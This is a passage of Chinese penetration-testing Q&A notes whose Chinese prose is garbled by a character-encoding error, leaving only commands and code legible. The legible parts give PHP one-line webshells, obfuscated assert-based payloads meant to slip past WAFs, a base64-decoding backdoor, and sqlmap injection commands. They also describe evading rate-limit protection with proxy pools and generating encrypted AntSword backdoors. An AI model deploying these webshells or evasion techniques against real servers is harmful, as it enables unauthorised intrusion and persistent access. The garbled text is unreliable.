ๅฆ‚ๆžœcmsๅ’Œๆก†ๆžถ้ƒฝๆฒก้—ฎ้ข˜๏ผŒ้œ€่ฆๆบ็ ๅฎก่ฎก๏ผŒๆ€Žไนˆๅฎก๏ผŸ sqlๅ‚ๆ•ฐๆŽงๅˆถไธญ็š„ๅฏๆŽงๆฅๆบๅœจ้‚ฃ้‡Œ๏ผŒๅŽปๅˆ†ๆž่ฟ™ไธชไบบไธบๆŽงๅˆถ็š„ๆฅๆบๅœจๅ“ช้‡Œ ๅŽป็œ‹ไธ€ไธ‹่ฟ™ไธชๆบ็ ๏ผŒๅˆ†ๆž่ฟ™ไธชๆบ็ ๅฏ่ƒฝไผšๅœจๅ“ช้‡Œๆœ‰ๆผๆดž๏ผŒๅ“ช้‡Œๅฏไปฅๆœ‰่พ“ๅ…ฅ ### 28.ๆกˆไพ‹ๆ€่ทฏ๏ผš ``` ่ฎฟ้—ฎrobots.txt ๆ นๆฎ็ˆฌ่™ซไฟกๆฏ่ง‚ๅฏŸ ่ฟ›่กŒๅˆๆญฅCMSๅˆคๆ–ญ๏ผŒๅŠๆ˜ฏๅฆๅญ˜ๅœจๆผๆดž ่ฟ›่กŒๆŠฅ้”™ๅˆคๆ–ญ๏ผŒ็œ‹ๆ˜ฏๅฆๆ˜พ็คบ็‰ˆๆœฌไฟกๆฏ ๅฐ่ฏ•่Žทๅ–ๅฏนๆ–นcms็‰ˆๆœฌ๏ผŒๅฆ‚/data/admin/ver.txt ่ฟ›่กŒCMSไธญๆŸไบ›ๆ•ๆ„Ÿๆ–‡ไปถ็š„ไธ‹่ฝฝ ๅฐ่ฏ•็›ฎๅฝ•ๆ‰ซๆ ๅฐ่ฏ•ๅฏปๆ‰พ็™ปๅฝ•็š„ๅŽๅฐๅœฐๅ€ ๅฐ่ฏ•ๅผฑๅฃไปค็ˆ†็ ดๅŽๅฐๅœฐๅ€ ็ซฏๅฃๆ‰ซๆ่ฟ›่กŒ่ง‚ๅฏŸ ๅˆคๆ–ญๅ…ถไป–ๅ…ณ้”ฎไฟกๆฏ ๅ‘็Žฐ888็ซฏๅฃๆšด้œฒ๏ผŒๅฐ่ฏ•ๅฎๅก”ๆœชๆŽˆๆƒๆผๆดž ่ฟ›่กŒ้—็•™ๆบ็ ็š„่Žทๅ–๏ผŒๅฐ่ฏ•ๅค‡ไปฝๆ–‡ไปถ็š„ๆœ็ดข ๅฎก่ฎกๆบ็ ็›ฎๅฝ•๏ผŒ่Žทๅ–ๆ•ฐๆฎๅบ“่ดฆๅทๅฏ†็  ๅฐ่ฏ•navicat่ฟ›่กŒ่ฟžๆŽฅๆ•ฐๆฎๅบ“ ๆ™ฎ้€š็”จๆˆทๅฏๆ”ฏๆŒๅค–่”๏ผŒไฝ†ๅฎๅก”ๅดๆœ‰้™ๅˆถ ๆœๅฏปๆบไปฃ็ ๏ผŒๅฏปๆ‰พๆ›ดๅคš็š„ๅŽ†ๅฒ้—็•™ไฟกๆฏ ๅœจๆบๆ–‡ไปถไธญๆ‰พๅˆฐๆ›ดๆ—ฉไน‹ๅ‰็š„ๅค‡ไปฝๆ–‡ไปถ ๆœ€็ปˆ่ฟžๆŽฅๆ•ฐๆฎๅบ“ๆˆๅŠŸ ``` ### 29.ๆ‰‹ๆœบ่ฝฏไปถๅฆ‚ไฝ•่ฟ›่กŒๆธ—้€ๆต‹่ฏ•๏ผŸ ๅ็ผ–่ฏ‘ๆๅ–url๏ผŒๆŠ“ๅŒ…่Žทๅ–url(bp,charles,fiddler,ๆŠ“ๅŒ…็ฒพ็ต)๏ผŒๅฆ‚ไธๅญ˜ๅœจๆญคๅ่ฎฎ๏ผŒ่ฝฌ็งปๅˆฐๅ…ถไป–ๅ่ฎฎ(wireshark)ๆต‹่ฏ• ๆ นๆฎurl่ฟ›่กŒๆ‰ซๆๅทฅๅ…ท็š„ไฝฟ็”จ๏ผŒๆ‰พไบคไบ’็š„ๅœฐๆ–น๏ผŒๆ‰พๅฏ่ƒฝๅ‡บ็Žฐsqlๅ‡บ็Žฐ็š„urlๅฆ‚?id= ๅˆฉ็”จcharles่ฟ›่กŒapp็š„ๆ‰ซๆ๏ผŒ่ฟ™ไธช็”จๆฅๆŠ“ๅ–ๆ‰‹ๆœบapp็š„ๆ•ฐๆฎๆ›ด้€‚็”จ ###### ๅฆ‚ๆžœappๅ†…ไธญๅฏไปฅๆ‰“ๅผ€้กต้ข๏ผŒไฝ†ๆ˜ฏ็”จ็ฝ‘้กตๆ‰“ๅผ€ๆ˜พ็คบไธๅ‡บๆฅ๏ผŸ ๅฏนๆ–นๆœ‰่ฏ†ๅˆซ๏ผŒๆฃ€ๆต‹ๅˆฐๅœจไฝฟ็”จappๆ—ถๅฏไปฅๆญฃๅธธ่ฎฟ้—ฎ๏ผŒไฝ†ๆ˜ฏ็”จ็ฝ‘้กตๆ‰“ๅผ€ๆ—ถๆ•ฐๆฎๅŒ…ๆž„้€ ไธๅŒ ๅฏไปฅๆ”นๅ˜ๆฏไธ€ๆฌก่ฎฟ้—ฎๆ—ถ็š„user-agent๏ผŒๆˆ–่€…ๅˆฉ็”จxray่ฟ›่กŒ่ขซๅŠจๆ‰ซๆ ###### xrayๅฆ‚ไฝ•้…ๅˆburpๅฎž็Žฐ่”ๅŠจ๏ผŒๆœ‰ไป€ไนˆๆ„ไน‰๏ผŸ ๅฏไปฅๅฎž็Žฐๅฏนๆ‰‹ๆœบๆต้‡็š„่‡ชๅŠจๆ‰ซๆ๏ผŒ็”ฑไบŽๆ‰‹ๆœบๅ’Œ็”ต่„‘ไธๅœจๅŒไธ€ipๆฎต๏ผŒ้œ€่ฆๅ…ˆ้€š่ฟ‡burpไปฃ็†ๆ‰‹ๆœบไธŠ็š„ๆต้‡ ๅœจ้€š่ฟ‡burp็š„ๆต้‡ๅ‡บๅฃไปฃ็†ๅˆฐxray๏ผŒไปŽ่€Œๅฎž็Žฐๅฏนๆ‰‹ๆœบ่ฝฏไปถ็š„่‡ชๅŠจๆ‰ซๆ ###### ccๆ”ปๅ‡ปๆ˜ฏไป€ไนˆ๏ผŸๅฆ‚ไฝ•้˜ฒๅพกCCๆ”ปๅ‡ป๏ผŸ ๆ‰พไธ€ไบ›็ฝ‘็ปœไธŠ็š„ไปฃ็†๏ผŒไธๆ–ญ็š„่ฎฟ้—ฎๆŸไธ€ไธช็ฝ‘็ซ™๏ผŒๅ ็”จ็ฝ‘็ซ™็š„่ฟžๆŽฅๆ•ฐ่ต„ๆบ๏ผŒ ๅฝ“ๅŒไธ€ๆ—ถ้—ดๅ†…่ฟžๆŽฅๅˆฐๆŸไธ€ไธช็ฝ‘็ซ™ๅ†…็š„่ฟžๆŽฅๆ•ฐ่พพๅˆฐ้™ๅˆถๆกไปถๆ—ถ๏ผŒ็ฝ‘็ซ™ไผš็›ดๆŽฅๅดฉๆบƒใ€‚ ๅฏไปฅๅผ€ๅฏWAF๏ผŒๆˆ–่€…่ฏ†ๅˆซ็œŸๅฎž่ฎฟ้—ฎๅœฐๅ€๏ผŒๅฆ‚ๆžœๆ˜ฏๅŒไธ€็›ฎๆ ‡๏ผŒ้˜ปๆญขๅ…ถ่ฎฟ้—ฎใ€‚ ### 30.ๅฆ‚ไฝ•ๅฏนๆ‰€ๆต‹็ฝ‘็ซ™่ฟ›่กŒๆ‰ฉๅคง็›ฎๆ ‡๏ผŸๅฎž็Žฐไฟกๆฏๆ”ถ้›†็š„ๆœ€ๅคงๅŒ–๏ผŸ ็ซฏๅฃ็ฑปๆ‰ซๆ๏ผŒๅฆ‚80ๆ˜ฏไธ€ไธช็ฝ‘็ซ™๏ผŒ8080ๅˆๆ˜ฏๅฆไธ€ไธช็ฝ‘็ซ™ ๅญๅŸŸๅๆ”ถ้›†๏ผŒ่ท‘ๅญ—ๅ…ธๆˆ–่€…ๅœจgoogleไธŠๆœ็ดขๅฏ่ƒฝ็›ธๅ…ณ็š„ๅŸŸๅ layer googleๆœ็ดข teemo ๅŸŸๅๅŽ็ผ€ๆ”ถ้›†๏ผŒๆŸฅ็œ‹ไธๅŒ็š„็ฝ‘็ซ™็š„ๅŽ็ผ€๏ผŒๆ˜ฏๅฆๅฑžไบŽๅŒไธ€ไธชๅ…ฌๅธ ๅ…ณ้”ฎ่ฏๆœ็ดข๏ผŒๆœ็ดขๅˆฐๅ…ฌๅธๅๅญ—ไน‹ๅŽ๏ผŒ็›ดๆŽฅๅผ•ๆ“Žๆœ็ดข่ฏฅๅ…ฌๅธ whoisๆŸฅ่ฏข๏ผŒๆŸฅๅŸŸๅ็š„ๆณจๅ†Œไบบ๏ผŒๅŸŸๅ็™ป่ฎฐ ๅฏนๆ‰€ๆœ‰webๅ‡ๆ‰ซๆ๏ผŒ็›ฎๅฝ•ๆ‰ซๆ๏ผŒๆ•ๆ„Ÿๆ–‡ไปถๆ‰ซๆ ๅฆ‚ๅพกๅ‰‘ dirmap ip่ฎฟ้—ฎ๏ผŒipๅฏนๅบ”็š„ๅœฐๅ€็›ฎๅฝ•ๆฏ”็ฝ‘็ซ™็š„็›ฎๅฝ•่ฆ้ซ˜๏ผŒๅฏ่ƒฝ่Žทๅ–ๅˆฐๆ•ๆ„Ÿๆบ็  ๅฐฑๆ˜ฏ้œ€่ฆไธๆ–ญ็š„ๆ‰ซ๏ผŒไธๆ–ญ็š„่ฎฟ้—ฎ๏ผŒๆŽฅ็€่Žทๅ–ๅˆฐๆ›ดๅคš็š„็›ฎๆ ‡ๆŽฅ็€ๆ‰ซ๏ผŒๆธ—้€ๆ˜ฏไธ€ไธชไธๆ–ญ็š„ๆŽ’้™ค็š„่ฟ‡็จ‹ ้’ˆๅฏนๆฏไธ€ไธชๆœๅŠก่ฟ›่กŒๆต‹่ฏ•ๆŽ’้™ค๏ผŒๆ˜ฏๅฆ่ƒฝๅˆฉ็”จEXP๏ผŒ่ƒฝๅฆๆ‹ฟๅˆฐๆƒ้™๏ผŒๅ†™ๅ…ฅwebshell ###### ๅฆ‚ๆ”ถ้›†ๅˆฐๆŸไธ€ไธช็ฝ‘็ซ™็š„็ซฏๅฃ8080ๆœ‰tomcatๆœๅŠก๏ผŒ่ฏฅๅฆ‚ไฝ•ๆต‹่ฏ•๏ผŸ ๅœจ็›ธๅ…ณๆผๆดžๅนณๅฐ้‡Œ่พนๅฆ‚exploit-db๏ผŒseebug๏ผŒ0dayไธŠๆœ็ดข็›ธๅ…ณtomcatๆ˜ฏๅฆๅญ˜ๅœจ้ซ˜ๅฑๆผๆดž๏ผŒ็”จๆœฌๅœฐ็š„searchexploit่ฟ›่กŒๆœ็ดขๆผๆดžๅŠ ไปฅๅˆฉ็”จ๏ผŒๅนถ่ฟ›่กŒๆผๆดž้ชŒ่ฏ๏ผŒๆˆ–่€…ๆ‰พ็ฝ‘็ปœไธŠๅ…ฌๅผ€็š„ๆ–‡็ซ ่ฟ›่กŒๆผๆดž็š„ๅค็Žฐใ€‚ ###### ็ซฏๅฃ็ฑป็š„ๆœๅŠกๆ€Žไนˆๆฃ€ๆต‹ๅผฑๅฃไปค๏ผŸ ็”จhydraไนๅคด่›‡ๆฅๆฃ€ๆต‹๏ผŒๆˆ–่€…็”จๅฏ่ง†ๅŒ–็š„่ถ…็บงๅผฑๅฃไปคๆฃ€ๆต‹ๅทฅๅ…ท๏ผŒ ๅฏไปฅ่‡ชๅฎšไน‰ๅญ—ๅ…ธ๏ผŒไนŸๅฏไปฅไฝฟ็”จ้ป˜่ฎค็š„ๅญ—ๅ…ธ่ฟ›่กŒ็ˆ†็ ด ๆณจๆ„sql็ˆ†็ ด็š„ๆ—ถๅ€™root่ดฆๆˆทๆœ‰ๅฏ่ƒฝไธๆ”ฏๆŒๅค–่” ###### ไป€ไนˆๆ˜ฏwsdl๏ผŸๅฏน็ฝ‘็ซ™็š„ๆผๆดžๆต‹่ฏ•ๆœ‰ไป€ไนˆๅฝฑๅ“๏ผŸ WSDL ๆ˜ฏๅŸบไบŽ XML ็š„็”จไบŽๆ่ฟฐ Web Services ไปฅๅŠๅฆ‚ไฝ•่ฎฟ้—ฎ Web Services ็š„่ฏญ่จ€ใ€‚ wsdlๆ˜ฏ็”จๆฅๅฎšไน‰ไธ€ไบ›็ฝ‘็ปœไธญ็š„ๆŽฅๅฃ็š„่ฏญ่จ€็š„๏ผŒไนŸๆ˜ฏๆœ‰ๅฏ่ƒฝๅญ˜ๅœจๆผๆดž็š„ ๅฏไปฅ้€š่ฟ‡ๆœ็ดขwsdl็ฑปไผผ็š„ๅ…ณ้”ฎ่ฏๆฅ่Žทๅ–ๅˆฐๆœ‰่ฐƒ็”จ่ฟ™ไธชๆŽฅๅฃ็š„urlๅœฐๅ€ ้€š่ฟ‡awvsๅทฅๅ…ทๅฏไปฅๅฏนwsdlๆŽฅๅฃ่ฟ›่กŒๆผๆดžๆ‰ซๆๅนถไผšๆšด้œฒๅ‡บexp๏ผŒๅฏไปฅๆผๆดž้ชŒ่ฏ ###### sqlmapๅฆ‚ไฝ•ๅœจไปปๆ„ไฝ็ฝฎ่ฟ›่กŒๆ•ฐๆฎ็š„ๆณจๅ…ฅ๏ผŸ ๅฐ†ๆ•ฐๆฎๅŒ…ๆˆช่Žทๅˆฐ๏ผŒๅฐ†้œ€่ฆๆณจๅ…ฅ็š„ๅœฐๆ–น็”จx*ไปฃๆ›ฟ๏ผŒๆ‰ง่กŒpython sqlmap.py -r 1.txt --batchๅฐฑๅฏไปฅๅผ€ๅง‹sqlๆณจๅ…ฅไบ† ๅฆ‚ๆžœๆ˜ฏpostๆณจๅ…ฅ๏ผŒไนŸๅฏไปฅๅฐ†post็š„ๆ•ฐๆฎๅŒ…ๅŽŸๅฐไธๅŠจ็š„ๆ”พ็€๏ผŒๆ‰ง่กŒๅ‘ฝไปคython sqlmap.py -r 1.txt -p name,ๅ…ถไธญname่กจ็คบ่ฆๆณจๅ…ฅ็š„ๅ‚ๆ•ฐ ### 31.ccๆœชๅผ€ๅฏๆ—ถ๏ผŒๅฆ‚ไฝ•็ป•่ฟ‡ๅฎ‰ๅ…จ็‹—๏ผŸ headๅ’Œget้ƒฝๆ˜ฏๅŽป่ฏทๆฑ‚๏ผŒๅ‰่€…็จๅพฎๅฟซไธ€ไบ›๏ผŒcc้˜ฒๆŠคๆœชๅผ€ๅฏๆ—ถ๏ผŒๅฎ‰ๅ…จ็‹—ไผšๆ‹ฆๆˆชhead๏ผŒๆจกๆ‹Ÿ็”จๆˆทๆไบคๆ•ฐๆฎๆ—ถ็š„ๆ•ฐๆฎๅŒ…๏ผŒ็ปๅฏนๆฏ”ๅ‘็Žฐ๏ผŒget่ฏทๆฑ‚็š„ๆ•ฐๆฎๅŒ…ไธไผš่ขซๆ‹ฆๆˆช๏ผŒๅ› ๆญค้œ€่ฆๆŠŠ้ป˜่ฎค็š„็›ฎๅฝ•ๆ‰ซๆ็š„head่ฏทๆฑ‚ๅ˜ๅŒ–ไธบget่ฏทๆฑ‚ใ€‚ ccๆœชๅผ€ๅฏๆ—ถ๏ผŒๅฏไปฅๆ›ดๆขๆไบคๆ–นๆณ•ๆˆ–่€…็›ดๆŽฅๅฐ†ๆ•ฐๆฎๅŒ…ๆจกๆ‹Ÿๆˆ็œŸๅฎž็š„็”จๆˆทๆ‰€ๆไบค็š„ๆ•ฐๆฎ่ฟ›่กŒ่ฏทๆฑ‚ใ€‚ ###### ccๆต้‡้˜ฒๆŠคๅผ€ๅฏไบ†๏ผŒๅฆ‚ไฝ•็ป•่ฟ‡ๅฎ‰ๅ…จ็‹—๏ผŸ ๅฏไปฅ้‡‡็”จๅปถๆ—ถ่ฎฟ้—ฎ๏ผŒๆˆ–่€…ไปฃ็†ๆฑ ๆŠ€ๆœฏๆˆ–่€…ๆœ็ดขๅผ•ๆ“Ž็š„็ˆฌ่™ซๆŠ€ๆœฏ็ป•่ฟ‡ใ€‚ ๅ…‰ๆ˜ฏๆจกๆ‹Ÿ็”จๆˆทๆ‰ซๆ็ฝ‘็ซ™๏ผŒๅณuser-agentไฝ็ฝฎไธบไธ€ไธชๅ•ไธ€็š„็”จๆˆท็š„ๆ—ถๅ€™๏ผŒๆ˜ฏไธ่ƒฝๆˆๅŠŸ็š„้ฟๅผ€cc้˜ฒๅพก็š„๏ผŒ้œ€่ฆๆจกๆ‹Ÿๆœ็ดขๅผ•ๆ“Ž็š„็ˆฌ่™ซๆŠ€ๆœฏใ€‚ ccไธป่ฆ้˜ฒๅพก็š„ๆ˜ฏๅŒไธ€ๆ—ถ้—ดๅ†…่ฟžๆŽฅๅˆฐ็ฝ‘็ซ™็š„่ฟžๆŽฅๆ•ฐ๏ผŒๅฐฑๆ˜ฏๆ‰“ๅผ€ไธๅ…ณ้—ญ็š„ๆƒ…ๅ†ต๏ผŒ็”จไปฃ็†ๆฑ ๆŠ€ๆœฏ่ฟ›่กŒๆผๆ‰ซๅฏไปฅ็ป•่ฟ‡ccใ€‚ไปฃ็†ๆฑ ๆŠ€ๆœฏๅฏไปฅไฝฟ็”จpython็ˆฌๅ–ๅ…่ดน็š„ไปฃ็†ไน‹ๅŽ่ฟ›่กŒๆŒ‡ๅฎšๆฌกๆ•ฐๆขไปฃ็†่ฎฟ้—ฎ๏ผŒๆˆ–่€…ๅˆฉ็”จptoxy_pool๏ผŒๆˆ–่€…่ดญไนฐ็ฝ‘็ปœไธŠๆ”ถ่ดน็š„ไปฃ็†ไบงๅ“ใ€‚ ###### ๅฆ‚ไฝ•็ป•่ฟ‡้˜ฟ้‡Œไบ‘็š„cc้˜ฒๆŠค๏ผŸ ้œ€่ฆ่ฟ›่กŒ็›ธๅ…ณ็š„ๆต‹่ฏ•๏ผŒ็ปๆต‹่ฏ•ๅ‘็Žฐๅปถๆ—ถๆˆ–ไปฃ็†ๆฑ ๅฏไปฅ็ป•่ฟ‡ใ€‚ ###### ็ป•่ฟ‡waf็š„ๆ€่ทฏ๏ผŸ ๆŸฅ็œ‹ๅทฅๅ…ทๆ•ฐๆฎๅŒ…ไธŽ็”จๆˆทๆ•ฐๆฎๅŒ…็š„ๅŒบๅˆซ๏ผŒๆŸฅ็œ‹waf็š„็›ธๅ…ณ่ฏดๆ˜Ž๏ผŒfuzzๆจก็ณŠๆต‹่ฏ• ๅฎๅก”ไผš็ฆๆญขๅฏนbakๆ–‡ไปถ็š„ๆ‰ซๆ๏ผŒๅฏไปฅๅฐ่ฏ•ๅฏนๅญ—ๅ…ธๅš่ฐƒๆ•ด๏ผŒๅฆ‚bak%20็ญ‰๏ผŒๆˆ–่€…ๅ‡็ผ“้€Ÿๅบฆๆˆ–่€…ๅฏน็บฟ็จ‹ไผ˜ๅŒ–ใ€‚ ๅฎž้™…ๅบ”็”จไธญ๏ผŒ่ฆ่ฟ›่กŒๅคšๆฌก็š„ๆต‹่ฏ•๏ผŒๅฐ่ฏ•ๆ‰พ็ช็ ดๅฃใ€‚ ### 31.ๆผๆดžๅ‘็Žฐ็š„ๆ—ถๅ€™ๅฆ‚ไฝ•็ป•่ฟ‡WAF๏ผŸ ไธ€่ˆฌๆ˜ฏ้€š่ฟ‡ๅปถๆ—ถ๏ผŒๆจกๆ‹Ÿๆœ็ดขๅผ•ๆ“Ž็ˆฌ่™ซๆˆ–่€…ไปฃ็†ๆฑ ๆŠ€ๆœฏๆž๏ผŒไฝ†ๆ˜ฏๅปถๆ—ถ้€Ÿๅบฆๅคชๆ…ข๏ผŒไธ€่ˆฌไธ้‡‡็”จ๏ผŒไผ˜ๅ…ˆ้€‰็”จไปฃ็†ๆฑ ๆŠ€ๆœฏใ€‚ ๅฏไปฅ่”ๅŠจawvs+burp+xray๏ผŒ้€š่ฟ‡burp็š„user optionsๅšไปฃ็†็ซฏๅฃ่ฝฌๅ‘ๅฏไปฅๆ›ด่ฏฆ็ป†็š„็œ‹ๅ‡บๆฅๆ•ฐๆฎๅŒ…็š„้€Ÿๅบฆ ๆญคๆ—ถ็”จawvsๅผ€ๅง‹ๅฏน็ฝ‘็ซ™่ฟ›่กŒๆต‹่ฏ•็š„ๆ—ถๅ€™๏ผŒxrayไธญไนŸๅŒๆญฅ่ฟ›่กŒไบ†ๆต‹่ฏ•๏ผŒๅฎž็Žฐไบ†ไธคไธชๅทฅๅ…ท็š„่”ๅŠจ proxy_pool้€‚ๅˆ็ˆฌ่™ซ๏ผŒไฝ†ๆ˜ฏไธ้€‚ๅˆ่ฟ‡WAF๏ผŒๆƒณ่ฆ่ฟ‡WAF่ฟ˜ๆ˜ฏ้œ€่ฆ็”จไป˜่ดนไปฃ็† ###### ๆผๆดžๅˆฉ็”จๆ—ถๅฆ‚ไฝ•็ป•่ฟ‡waf๏ผŸ sqlmap้‡‡็”จ่‡ชๅทฑ้€š่ฟ‡waf่ง„ๅˆ™้˜…่ฏปๆ€ป็ป“็š„็ป•่ฟ‡่ง„ๅˆ™ๅ†™ๆˆ็š„่„šๆœฌ๏ผŒไปฅtamperๆŒ‡ๅฎš๏ผŒๅฆๅค–่ฎพ็ฝฎcookie๏ผŒuser-agent๏ผŒproxy๏ผŒๅปถๆ—ถ็ญ‰ ๅฏไปฅ้€š่ฟ‡ๆต่งˆๅ™จ่ฎพ็ฝฎไปฃ็†็ป่ฟ‡burp๏ผŒๅ†ๅฐ†ๆต้‡่ฝฌๅ‘่‡ณไปฃ็†ๆฑ ๅทฅๅ…ท๏ผŒไธไป…่ƒฝๆŸฅ็œ‹ๆ•ฐๆฎๅŒ…่ฟ˜่ƒฝๅฎž็Žฐcc็š„็ป•่ฟ‡ ๆ–‡ไปถไธŠไผ ็š„payloadๅฏไปฅ้‡‡็”จๆˆชๆ–ญ๏ผŒๅคงๅฐๅ†™๏ผŒๅŒๅ†™็ป•่ฟ‡๏ผŒๅฐพ้ƒจไธบ็ฉบ๏ผŒ็‚น็ป•่ฟ‡๏ผŒphp5๏ผŒ::$DATA็ญ‰ๆ–นๅผ็ป•่ฟ‡ xsstrikeๅฏไปฅ่ฎพ็ฝฎproxy๏ผŒtimeout็ญ‰ๆ–นๅผ๏ผŒไฝ†ๆ˜ฏ้œ€่ฆไธ€ไบ›ๅ…ถไป–็š„่งฆๅ‘๏ผŒๆ”ปๅ‡ปๆˆๆœฌๅคง ###### ๅŠ ๅฏ†ๆœ‰ๅ“ชไบ›็ฑปๅž‹๏ผŸ ๅฏ้€†็š„๏ผšๅฆ‚base64๏ผŒhex๏ผŒurl ๏ผŒascii๏ผˆๅฏไปฅ็›ดๆŽฅ่งฃๅฏ†๏ผ‰ ไธๅฏ้€†๏ผšๅฆ‚md5๏ผŒAES๏ผŒsha256 ๏ผˆmd5่งฃๅฏ†ๆ˜ฏๆžšไธพ็ ด่งฃ๏ผ‰ ###### RCEๆ‰ง่กŒๆผๆดžไธญๅฆ‚ไฝ•่ฟ›่กŒWAF็š„็ป•่ฟ‡๏ผŸ ่€ƒ่™‘ๅˆฐๅŠ ๅฏ†ๆ–นๅผ๏ผŒไฝ†ๆ˜ฏๅฆ‚ๆžœๅฏนๆ–นๆ˜ฏๅฎๅก”ไผš่ฎฒbase64็ผ–็ ๆ–นๅผ่ฟ‡ๆปค๏ผŒ้‡‡็”จๅ…ถไป–ๅฏ้€†็š„็ฎ—ๆณ• ๅ…ถไธญhexๅŠ ๅฏ†phpinfo();ๅฐฑๆ˜ฏ706870696E666F28293B txt=$hex='706870696E666F28293B';assert(pack("H*",$hex)); ๆˆ–่€…้‡‡็”จๆ›ฟๆข็š„ๆ–นๆณ•๏ผŒๆ›ฟๆขๆŽ‰ๆ•ๆ„Ÿ็š„ๅญ—็ฌฆไธฒ,ๆˆ–่€…็›ดๆŽฅไผ ๅ‚ txt=$y=str_replace('x','','phpxinxfo();');assert($y); txt=$x='asse';$xx='rt';$xxx=$x.$xx;$y=str_replace('x','','phpxinxfo();');$xxx($y); txt=$z=REQUEST['x']$y=str_replace('x','','phpxinxfo();');$z($y);ๅนถๅœจๅ…ถไป–ๆไบคๆ–นๅผไธŠไผ x ๆ นๆฎ่ฟ‡ๆปค่ง„ๅˆ™ๆฅ่€ƒ่™‘้‡‡็”จๅ“ช็”จ็ป•่ฟ‡ๆ–นๅผ๏ผŒๆŠฅ้”™ไน‹ๅŽๅฐฑๅฐ่ฏ•ๅ…ถไป–็š„ๆ–นๅผ ###### ๆ–‡ไปถๅŒ…ๅซๆผๆดž็ป•่ฟ‡WAF๏ผŸ ้œ€่ฆ่ฟ›่กŒ็ฌฆๅทๅ˜ๅผ‚๏ผŒๅฆ‚../ ..\ ./ .\็ญ‰ๆ–นๅผ ###### ๅธธ่ง็š„phpไธ€ๅฅ่ฏๅŽ้—จ๏ผŸ <?php @eval($_POST['x']);?> evalๆ˜ฏๆ•ๆ„Ÿๅ‡ฝๆ•ฐ๏ผŒๅฎนๆ˜“่ขซ่ฟ‡ๆปค <?php assert($_POST['x']);?> ไธ€่ˆฌๅœจ่ฟ™ไธชๅŸบ็ก€ไธŠ่ฟ›่กŒ่ฐƒๆ•ด๏ผŒ ###### ๅฆ‚ไฝ•็ป•่ฟ‡ๅธธ่งwafๅฏนไธ€ๅฅ่ฏๅŽ้—จ็š„ๆ‹ฆๆˆช๏ผŸ ้œ€่ฆๆœฌๅœฐๆญๅปบ็›ธๅŒ็š„็Žฏๅขƒ่ฟ›่กŒๆต‹่ฏ•๏ผŒๅฆ‚ๅฎๅก”้œ€่ฆๅฐ่ฏ•ไปฅไธ‹ๆ–นๅผ็ป•่ฟ‡ๅฏนpayload็š„ๆฃ€ๆต‹ ไธŠไผ ็š„ๅŽ้—จไปฃ็ ็š„ๆ–‡ไปถๅๅญ—ไธ่ƒฝๆ˜ฏ้žๅธธๆ•ๆ„Ÿ็š„ๅๅญ—๏ผŒๅฆ‚shell.phpๆ˜ฏไธๆ”ฏๆŒ็š„ ๅ˜้‡่ฆ†็›–็š„ๆ–นๆณ•ๅฆ‚ไธ‹ <?php $a=$_GET['x'];$aa=$_GET['y'];$b($_POST['z'])?> x=b&y=assertๅนถๅŽ้—จๅฏ†็ ๆ˜ฏpost็š„z ่ฟ™็งๆ–นๅผๅฏไปฅๆˆๅŠŸ็ป•่ฟ‡๏ผŒไฝ†ๅฎๅก”ไผšๅฏนz็š„ไผ ๅ…ฅ็š„phpinfo();่ฟ›่กŒ่ฟ‡ๆปคๆ‹ฆๆˆช๏ผŒๆญคๆ—ถ้œ€่ฆๅŠ ๅฏ† ๅฆ‚z=cGhwaW5mbygpOw== ไบŽๆญคๅŒๆ—ถ๏ผŒๅฐฑ้œ€่ฆๅœจไผ ๅ…ฅ็š„ๅŽ้—จๆ–‡ไปถไธญ่ฟ›่กŒbase64่งฃ็  ๅณๆœ€ๅˆ็š„ๅŽ้—จๆ–‡ไปถๅ˜ไธบไบ†<?php assert(base64_decode($_POST['x']));?> ###### ๅŠ ๅฏ†ๆ–‡ไปถ็š„ๆ–นๆณ•๏ผš ้€š่ฟ‡ https://github.com/djunny/enphp ๅŠ ๅฏ†ๆœ€ๅˆ็š„ๅŽ้—จๆ–‡ไปถ ๆˆ–่€…ๅˆฉ็”จ็ฝ‘ไธŠๆŽฅๅฃ https://www.phpjiami.com/phpjiami.html ่ฟ›่กŒๅŠ ๅฏ†ๅŽ้—จๆ–‡ไปถ ๅŠ ๅฏ†ไน‹ๅŽๆ˜ฏไนฑ็ ๅฝขๅผ๏ผŒๆฒกๆœ‰ๅฏ†ๅŒ™็š„่ฏๆ— ๆณ•่งฃๅฏ†๏ผŒๅฏ็ป•่ฟ‡ๅฎๅก”ๅฎ‰ๅ…จ็‹— ###### ๅผ‚ๆˆ–็”Ÿๆˆ็š„ๆ–นๆณ•๏ผš ๅœจๆœฌๅœฐ็š„ๅผ‚ๆˆ–็”Ÿๆˆ็š„ไปฃ็ ไธŠ็›ดๆŽฅ็”Ÿๆˆphp็š„ๅŽ้—จๆ–‡ไปถ๏ผŒๆญคๅŽ้—จๅฏไฝœไธบ่šๅ‰‘็š„ๅŽ้—จๅทฅๅ…ท ๅฆ‚ๆžœ่ฆ่ฟ›่กŒbase64ๅŠ ๅฏ†ๅŽ็š„ๅ€ผไผ ่พ“็š„่ฏ๏ผŒ้œ€่ฆๆ นๆฎ็”Ÿๆˆ็š„ๅŽ้—จๆ–‡ไปถ็š„ไปฃ็ ่ฎพ็ฝฎid็š„ๅ€ผ ไธ“้—จ็”Ÿๆˆ่šๅ‰‘ๅŽ้—จไปฃ็ ็š„ๅทฅๅ…ท https://github.com/yzddmr6/as_webshell_venom ###### ่šๅ‰‘็š„ๆŒ‡็บนๅคด้€ ๆˆๆ–‡ไปถ็ฎก็†ๆ—ถๆ— ๆณ•ๆ˜พ็คบๆ–‡ไปถ็š„้—ฎ้ข˜ๆ€Žไนˆๅค„็†๏ผŸ ๆŠ“ๅ–่šๅ‰‘่ƒฝๆญฃๅธธๆ–‡ไปถ็ฎก็†็š„ๆ•ฐๆฎๅŒ…ๆ—ถ่ฟ›่กŒๅˆ†ๆž๏ผŒๅ‘็Žฐ่šๅ‰‘ไนŸๆ˜ฏๆ‰ง่กŒไบ†็›ธๅ…ณๆ•ๆ„Ÿๆ“ไฝœไน‹ๅŽ็š„ๅŠ ๅฏ†ไฟกๆฏ ็Žฐๅœจๅทฒ็ปๅฐ†ๅŽ้—จไปฃ็ ๅ†™ๅ…ฅๅˆฐไบ†ๅฏนๆ–น็š„ๆœๅŠกๅ™จ๏ผŒๅช้œ€่ฆ่‡ชๅทฑๅ†™ๅŽ้—จ่ฏปๅ–ๆˆ–่€…ๅ†™ๅ…ฅๆ–‡ไปถๅˆฐๅฏนๆ–นๅŽๅฐ ๅฏไปฅๅˆฉ็”จvar_dump(scandir('.'))่ฏปๅ–ๆœฌ็บง็š„็›ฎๅฝ•๏ผŒๅนถไธ”่ฟ›่กŒbase64็ผ–็ ๅŽไผ 